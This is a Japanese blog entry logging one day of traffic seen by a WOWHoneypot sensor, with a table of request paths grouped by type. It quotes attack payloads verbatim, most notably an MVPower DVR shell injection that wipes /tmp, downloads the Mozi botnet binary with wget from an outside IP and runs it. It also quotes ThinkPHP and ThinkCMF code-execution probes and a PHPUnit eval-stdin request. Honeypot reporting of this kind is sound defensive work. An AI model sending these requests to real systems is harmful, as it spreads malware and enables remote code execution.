23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(328日目)

2020/02/08(土)

トータルは104件でした。

ハンティングログは以下です。

111.42.103[.]78 wget+hxxp[:]//111.42.103[.]78:54280/Mozi.a

www.virustotal.com

件数 概要 リクエス
59 アクセス GET /
10 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
8 調査 GET /is_test
3 調査 GET /script
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 WordPress の Pingback を狙った通信 POST /xmlrpc.php
1 PHPUnit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 NMAPによるスキャン POST /sdk
1 WordPress の Pingback を狙った通信 POST /blog/xmlrpc.php
1 調査 OPTIONS /
1 調査 HEAD /
1 不正中継の調査 GET hxxp[:]//45.76.45.209/
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 MVPower DVRの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//111.42.103.78:54280/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
1 NMAPによるスキャン GET /nmaplowercheck1581129329
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 NMAPによるスキャン GET /evox/about
1 NMAPによるスキャン GET /NmapUpperCheck1581129329
1 NMAPによるスキャン GET /Nmap/folder/check1581129329
1 D-Linkルータの脆弱性の調査 GET /HNAP1
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm